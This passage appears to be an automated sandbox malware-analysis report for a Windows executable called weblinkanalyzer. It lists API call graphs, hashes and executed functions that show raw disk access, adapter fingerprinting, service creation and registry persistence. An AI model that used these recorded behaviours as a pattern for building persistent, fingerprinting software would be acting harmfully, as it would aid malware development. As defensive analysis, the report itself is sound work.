3757->3758 3759 4051aa 3757->3759 3759->3758 3760 405094 RtlUnwind 3759->3760 3760->3759 3217 40218d 3218 4026ef RegSetValueExA 3217->3218 3220 40dc54 RegCloseKey 3218->3220 3633 402211 3634 402216 3633->3634 3635 402898 GetModuleHandleA 3634->3635 3636 40d282 GetModuleFileNameA 3635->3636 3222 403112 GetVersion 3246 40344a HeapCreate 3222->3246 3224 403171 3225 403176 3224->3225 3226 40317e 3224->3226 3321 40322d 3225->3321 3258 404ee6 3226->3258 3229 403186 GetCommandLineA 3272 404db4 3229->3272 3234 4031a0 3304 404aae 3234->3304 3236 4031a5 3237 4031aa GetStartupInfoA 3236->3237 3317 404a56 3237->3317 3239 4031bc GetModuleHandleA 3241 4031e0 3239->3241 3327 4047fd 3241->3327 3247 4034a0 3246->3247 3248 40346a 3246->3248 3247->3224 3334 403302 3248->3334 3251 403486 3254 4034a3 3251->3254 3348 403cf8 3251->3348 3252 403479 3346 4034a7 HeapAlloc 3252->3346 3254->3224 3255 403483 3255->3254 3257 403494 HeapDestroy 3255->3257 3257->3247 3411 403010 3258->3411 3261 404f05 GetStartupInfoA 3264 404f51 3261->3264 3265 405016 3261->3265 3264->3265 3268 403010 12 API calls 3264->3268 3271 404fc2 3264->3271 3266 40507d SetHandleCount 3265->3266 3267 40503d GetStdHandle 3265->3267 3266->3229 3267->3265 3269 40504b GetFileType 3267->3269 3268->3264 3269->3265 3270 404fe4 GetFileType 3270->3271 3271->3265 3271->3270 3273 404e02 3272->3273 3274 404dcf GetEnvironmentStringsW 3272->3274 3276 404dd7 3273->3276 3277 404df3 3273->3277 3275 404de3 GetEnvironmentStrings 3274->3275 3274->3276 3275->3277 3278 403196 3275->3278 3279 404e0f GetEnvironmentStringsW 3276->3279 3282 404e1b 3276->3282 3277->3278 3280 404e95 GetEnvironmentStrings 3277->3280 3285 404ea1 3277->3285 3295 404b67 3278->3295 3279->3278 3279->3282 3280->3278 3280->3285 3281 404e30 WideCharToMultiByte 3283 404e81 FreeEnvironmentStringsW 3281->3283 3284 404e4f 3281->3284 3282->3281 3282->3282 3283->3278 3287 403010 12 API calls 3284->3287 3286 403010 12 API calls 3285->3286 3293 404ebc 3286->3293 3288 404e55 3287->3288 3288->3283 3289 404e5e WideCharToMultiByte 3288->3289 3291 404e78 3289->3291 3292 404e6f 3289->3292 3290 404ed2 FreeEnvironmentStringsA 3290->3278 3291->3283 3477 403251 3292->3477 3293->3290 3296 404b79 3295->3296 3297 404b7e GetModuleFileNameA 3295->3297 3507 406707 3296->3507 3299 404ba1 3297->3299 3300 403010 12 API calls 3299->3300 3301 404bc2 3300->3301 3302 404bd2 3301->3302 3303 403208 7 API calls 3301->3303 3302->3234 3303->3302 3305 404abb 3304->3305 3308 404ac0 3304->3308 3306 406707 19 API calls 3305->3306 3306->3308 3307 403010 12 API calls 3309 404aed 3307->3309 3308->3307 3310 403208 7 API calls 3309->3310 3316 404b01 3309->3316 3310->3316 3311 404b44 3312 403251 7 API calls 3311->3312 3313 404b50 3312->3313 3313->3236 3314 403010 12 API calls 3314->3316 3315 403208 7 API calls 3315->3316 3316->3311 3316->3314 3316->3315 3318 404a5f 3317->3318 3320 404a64 3317->3320 3319 406707 19 API calls 3318->3319 3319->3320 3320->3239 3322 403236 3321->3322 3323 40323b 3321->3323 3324 405264 7 API calls 3322->3324 3325 40529d 7 API calls 3323->3325 3324->3323 3326 403244 ExitProcess 3325->3326 3531 40481f 3327->3531 3330 4048d2 3331 4048de 3330->3331 3332 404a07 UnhandledExceptionFilter 3331->3332 3333 4031fa 3331->3333 3332->3333 3357 402ef0 3334->3357 3337 403345 GetEnvironmentVariableA 3339 403422 3337->3339 3342 403364 3337->3342 3338 40332b 3338->3337 3340 40333d 3338->3340 3339->3340 3362 4032d5 GetModuleHandleA 3339->3362 3340->3251 3340->3252 3343 4033a9 GetModuleFileNameA 3342->3343 3344 4033a1 3342->3344 3343->3344 3344->3339 3359 4053f0 3344->3359 3347 4034c3 3346->3347 3347->3255 3349 403d05 3348->3349 3350 403d0c HeapAlloc 3348->3350 3351 403d29 VirtualAlloc 3349->3351 3350->3351 3352 403d61 3350->3352 3353 403d49 VirtualAlloc 3351->3353 3354 403e1e 3351->3354 3352->3255 3353->3352 3355 403e10 VirtualFree 3353->3355 3354->3352 3356 403e26 HeapFree 3354->3356 3355->3354 3356->3352 3358 402efc GetVersionExA 3357->3358 3358->3337 3358->3338 3364 405407 3359->3364 3363 4032ec 3362->3363 3363->3340 3366 40541f 3364->3366 3369 40544f 3366->3369 3371 405c3b 3366->3371 3367 405403 3367->3339 3368 405c3b 6 API calls 3368->3369 3369->3367 3369->3368 3375 4068ae 3369->3375 3372 405c59 3371->3372 3374 405c4d 3371->3374 3381 40697a 3372->3381 3374->3366 3376 4068d9 3375->3376 3380 4068bc 3375->3380 3377 405c3b 6 API calls 3376->3377 3378 4068f5 3376->3378 3377->3378 3378->3380 3393 406ac3 3378->3393 3380->3369 3382 4069c3 3381->3382 3383 4069ab GetStringTypeW 3381->3383 3384 406a12 3382->3384 3385 4069ee GetStringTypeA 3382->3385 3383->3382 3386 4069c7 GetStringTypeA 3383->3386 3388 406aaf 3384->3388 3389 406a28 MultiByteToWideChar 3384->3389 3385->3388 3386->3382 3386->3388 3388->3374 3389->3388 3390 406a4c 3389->3390 3390->3388 3391 406a86 MultiByteToWideChar 3390->3391 3391->3388 3392 406a9f GetStringTypeW 3391->3392 3392->3388 3394 406af3 LCMapStringW 3393->3394 3395 406b0f 3393->3395 3394->3395 3396 406b17 LCMapStringA 3394->3396 3398 406b75 3395->3398 3399 406b58 LCMapStringA 3395->3399 3396->3395 3397 406c51 3396->3397 3397->3380 3398->3397 3400 406b8b MultiByteToWideChar 3398->3400 3399->3397 3400->3397 3401 406bb5 3400->3401 3401->3397 3402 406beb MultiByteToWideChar 3401->3402 3402->3397 3403 406c04 LCMapStringW 3402->3403 3403->3397 3404 406c1f 3403->3404 3405 406c25 3404->3405 3407 406c65 3404->3407 3405->3397 3406 406c33 LCMapStringW 3405->3406 3406->3397 3407->3397 3408 406c9d LCMapStringW 3407->3408 3408->3397 3409 406cb5 WideCharToMultiByte 3408->3409 3409->3397 3420 403022 3411->3420 3414 403208 3415 403211 3414->3415 3416 403216 3414->3416 3457 405264 3415->3457 3463 40529d 3416->3463 3421 40301f 3420->3421 3423 403029 3420->3423 3421->3261 3421->3414 3423->3421 3424 40304e 3423->3424 3425 403072 3424->3425 3426 40305d 3424->3426 3428 4030b1 HeapAlloc 3425->3428 3432 40306b 3425->3432 3439 403ff0 3425->3439 3426->3432 3433 403843 3426->3433 3429 4030c0 3428->3429 3429->3423 3430 403070 3430->3423 3432->3428 3432->3429 3432->3430 3436 403875 3433->3436 3434 403914 3438 403923 3434->3438 3453 403bfd 3434->3453 3436->3434 3436->3438 3446 403b4c 3436->3446 3438->3432 3440 403ffe 3439->3440 3441 4040ea VirtualAlloc 3440->3441 3442 4041bf 3440->3442 3445 4040bb 3440->3445 3441->3445 3443 403cf8 5 API calls 3442->3443 3443->3445 3445->3432 3447 403b8f HeapAlloc 3446->3447 3448 403b5f HeapReAlloc 3446->3448 3449 403bb5 VirtualAlloc 3447->3449 3450 403bdf 3447->3450 3448->3450 3451 403b7e 3448->3451 3449->3450 3452 403bcf HeapFree 3449->3452 3450->3434 3451->3447 3452->3450 3454 403c0f VirtualAlloc 3453->3454 3456 403c58 3454->3456 3456->3438 3458 40526e 3457->3458 3459 40529b 3458->3459 3460 40529d 7 API calls 3458->3460 3459->3416 3461 405285 3460->3461 3462 40529d 7 API calls 3461->3462 3462->3459 3465 4052b0 3463->3465 3464 4053c7 3467 4053da GetStdHandle WriteFile 3464->3467 3465->3464 3466 4052f0 3465->3466 3471 40321f 3465->3471 3468 4052fc GetModuleFileNameA 3466->3468 3466->3471 3467->3471 3469 405314 3468->3469 3472 406723 3469->3472 3471->3261 3473 406730 LoadLibraryA 3472->3473 3475 406772 3472->3475 3474 406741 GetProcAddress 3473->3474 3473->3475 3474->3475 3476 406758 GetProcAddress GetProcAddress 3474->3476 3475->3471 3476->3475 3478 403279 3477->3478 3479 40325d 3477->3479 3478->3291 3480 403267 3479->3480 3481 40327d 3479->3481 3483 4032a9 HeapFree 3480->3483 3484 403273 3480->3484 3482 4032a8 3481->3482 3486 403297 3481->3486 3482->3483 3483->3478 3488 40351a 3484->3488 3494 403fab 3486->3494 3489 403558 3488->3489 3493 40380e 3488->3493 3490 403754 VirtualFree 3489->3490 3489->3493 3491 4037b8 3490->3491 3492 4037c7 VirtualFree HeapFree 3491->3492 3491->3493 3492->3493 3493->3478 3495 403fd8 3494->3495 3496 403fee 3494->3496 3495->3496 3498 403e92 3495->3498 3496->3478 3501 403e9f 3498->3501 3499 403f4f 3499->3496 3500 403ec0 VirtualFree 3500->3501 3501->3499 3501->3500 3503 403e3c VirtualFree 3501->3503 3504 403e59 3503->3504 3505 403e89 3504->3505 3506 403e69 HeapFree 3504->3506 3505->3501 3506->3501 3508 406710 3507->3508 3509 406717 3507->3509 3511 406343 3508->3511 3509->3297 3518 4064dc 3511->3518 3514 4064d0 3514->3509 3516 406386 GetCPInfo 3517 40639a 3516->3517 3517->3514 3523 406582 GetCPInfo 3517->3523 3519 4064fc 3518->3519 3520 4064ec GetOEMCP 3518->3520 3521 406501 GetACP 3519->3521 3522 406354 3519->3522 3520->3519 3521->3522 3522->3514 3522->3516 3522->3517 3525 4065a5 3523->3525 3530 40666d 3523->3530 3524 40697a 6 API calls 3526 406621 3524->3526 3525->3524 3527 406ac3 9 API calls 3526->3527 3528 406645 3527->3528 3529 406ac3 9 API calls 3528->3529 3529->3530 3530->3514 3532 40482b GetCurrentProcess TerminateProcess 3531->3532 3535 40483c 3531->3535 3532->3535 3533 4031e9 3533->3330 3534 4048a6 ExitProcess 3535->3533 3535->3534 3539 402994 CopyFileA 3637 40d415 GetModuleHandleA 3761 404395 3766 405cb0 3761->3766 3763 4043a3 3764 4043d5 3763->3764 3765 405c3b 6 API calls 3763->3765 3764->3764 3765->3763 3767 405cdd 3766->3767 3770 405cc0 3766->3770 3768 405c3b 6 API calls 3767->3768 3769 405cfb 3767->3769 3768->3769 3769->3770 3771 406ac3 9 API calls 3769->3771 3770->3763 3771->3770 3638 402a1b 3639 40d9e5 GetModuleHandleA 3638->3639 3640 40d945 GetModuleFileNameW 3639->3640 3641 40db26 3640->3641 3772 40219d 3774 4021a2 3772->3774 3773 402a02 3774->3773 3775 40d6ea GetLastError 3774->3775 3776 40d953 LoadLibraryExA 3775->3776 3777 40d96a 3776->3777 3777->3777 3580 40481f 3581 40482b GetCurrentProcess TerminateProcess 3580->3581 3584 40483c 3580->3584 3581->3584 3582 4048b6 3583 4048a6 ExitProcess 3584->3582 3584->3583 3716 402721 3717 403010 12 API calls 3716->3717 3718 402726 3717->3718 3698 4028a4 3699 40d2c8 CreateServiceA 3698->3699 3216 40d62b RegCreateKeyExA 3778 4025ad 3779 4025b2 3778->3779 3780 40d253 GetTickCount 3779->3780 3642 402a32 3643 402a37 3642->3643 3644 40db2e GetCommandLineW 3643->3644 3781 4023b3 RegisterServiceCtrlHandlerA 3782 4023d6 3781->3782 3783 4024cc 3781->3783 3784 4023e4 SetServiceStatus GetLastError CreateEventA 3782->3784 3785 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 3784->3785 3786 40243e GetLastError 3784->3786 3787 4024c3 SetServiceStatus 3785->3787 3786->3787 3787->3783 3645 405c36 3646 405c59 3645->3646 3648 405c4d 3645->3648 3647 40697a 6 API calls 3646->3647 3647->3648 3788 40d1b6 3789 4021a2 3788->3789 3790 402a02 3788->3790 3789->3790 3791 40d6ea GetLastError 3789->3791 3792 40d953 LoadLibraryExA 3791->3792 3793 40d96a 3792->3793 3793->3793 3794 4025ba 3795 40d268 GetModuleFileNameA 3794->3795 3649 40283e 3652 401f64 FindResourceA 3649->3652 3651 402843 3653 401f86 GetLastError SizeofResource 3652->3653 3654 401f9f 3652->3654 3653->3654 3655 401fa6 LoadResource LockResource GlobalAlloc 3653->3655 3654->3651 3656 401fd2 3655->3656 3657 401ffb GetTickCount 3656->3657 3659 402005 GlobalAlloc 3657->3659 3659->3654

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                                                                                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                                                                                                                                                  • API String ID: 514930453-3667123677
                                                                                                                                                                                                                                  • Opcode ID: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                                                                                                                                  • Instruction ID: 696171d77ced3da8e64ebdc8d7a45064a9ae827dbc58ea61f09f05304c00b930
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6421D870940209AEDF219FA5CD447EF7BB8EF41304F0440BAD604B22E1E7789985CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402e56 31->33 37 401b09-401b0c 32->37 38 401b3a-401b44 FindCloseChangeNotification 32->38 33->32 34->31 39 401adb-401af1 call 402e70 call 4018cc 34->39 35->31 41 401b27-401b34 call 402e48 37->41 42 401b0e-401b17 GetLastError 37->42 38->27 39->31 41->29 41->38 42->38 44 401b19-401b1c 42->44 44->41 47 401b1e-401b24 44->47 47->41
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                                                                                                                                                  • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                                                                                                                                  • String ID: \\.\PhysicalDrive0
                                                                                                                                                                                                                                  • API String ID: 3786717961-1180397377
                                                                                                                                                                                                                                  • Opcode ID: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                                                                                                                                  • Instruction ID: 8e9e512524d6225b66ba562a13c5a7f417e6abf84bb9e2e9af9964b6e94f018c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE318B71D01218EACB21EFA5CD849EFBBB8FF41750F20407AE514B22A0E7785E45CB98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D234 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 121 40d234-40dc65 StartServiceCtrlDispatcherA
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CtrlDispatcherServiceStart
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3789849863-0
                                                                                                                                                                                                                                  • Opcode ID: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
                                                                                                                                                                                                                                  • Instruction ID: 707de1fed31c9c9cc4664e0c652b34d30681ff1bd6120e3740f17fb32104e870
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42D05B20408100C6C21417E555550783765DD55330B11CF7690FE714E28A7904CBA61E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004026E9 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 135 4026e9-40d658 138 40d7f5-40dc65 StartServiceCtrlDispatcherA 135->138
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CtrlDispatcherServiceStart
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3789849863-0
                                                                                                                                                                                                                                  • Opcode ID: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
                                                                                                                                                                                                                                  • Instruction ID: 789ae47976887c049220f5e5451efe9368f5d3cf5dad1ab7781d5bfdbef77079
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06C0022090C411D6C6186BD0AB540716638E65A356F208ABAD45BB08E68F7D088EF62E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403112 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 00403138
                                                                                                                                                                                                                                    • Part of subcall function 0040344A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                                                                                                                                    • Part of subcall function 0040344A: HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 00403186
                                                                                                                                                                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 004031B1
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004031D4
                                                                                                                                                                                                                                    • Part of subcall function 0040322D: ExitProcess.KERNEL32 ref: 0040324A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2057626494-0
                                                                                                                                                                                                                                  • Opcode ID: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                                                                                                                                  • Instruction ID: 617ad2e6012ff9c1e059bad989762b11f9743b1554ab2ac8c32517e064b37c31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2217CB1940615AADB04EFB6DE46A6E7BB8EB45714F10413EF605BB2D1DB384900CBAC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040481F Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 79 40481f-404829 80 40482b-404836 GetCurrentProcess TerminateProcess 79->80 81 40483c-404852 79->81 80->81 82 404890-4048a4 call 4048b8 81->82 83 404854-40485b 81->83 91 4048b6-4048b7 82->91 92 4048a6-4048b0 ExitProcess 82->92 85 40485d-404869 83->85 86 40487f-40488f call 4048b8 83->86 88 40486b-40486f 85->88 89 40487e 85->89 86->82 93 404871 88->93 94 404873-40487c 88->94 89->86 93->94 94->88 94->89
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 0040482F
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 00404836
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004048B0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
                                                                                                                                                                                                                                  • Instruction ID: 144ee4ae690132be24d3b7439d4fde7c7cee5440a8ed28615e41e0a9dc7ff649
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D601DB77640350DEEA10BF55FE85A1677A4FBC5750B10893FE540721E2C734AC41CA6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040344A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 96 40344a-403468 HeapCreate 97 4034a0-4034a2 96->97 98 40346a-403477 call 403302 96->98 101 403486-403489 98->101 102 403479-403484 call 4034a7 98->102 104 4034a3-4034a6 101->104 105 40348b call 403cf8 101->105 108 403490-403492 102->108 105->108 108->104 109 403494-40349a HeapDestroy 108->109 109->97
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                                                                                                                                    • Part of subcall function 00403302: GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                                                                                                                                    • Part of subcall function 004034A7: HeapAlloc.KERNEL32(00000000,00000140,00403483,000003F8), ref: 004034B4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2507506473-0
                                                                                                                                                                                                                                  • Opcode ID: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                                                                                                                                  • Instruction ID: e60f5d10070dd6772d4a54549668055c4e54cd76725331d0105a0707e5516faa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F0657461430299EB215F719E4772A2E98DB54797F10453BF406FC1D0EB7C86819909
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040218D Relevance: 3.0, APIs: 2, Instructions: 14registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 110 40218d-40dc54 RegSetValueExA RegCloseKey
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(?,?,?,00000004), ref: 0040D70D
                                                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,00000004), ref: 0040DC54
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
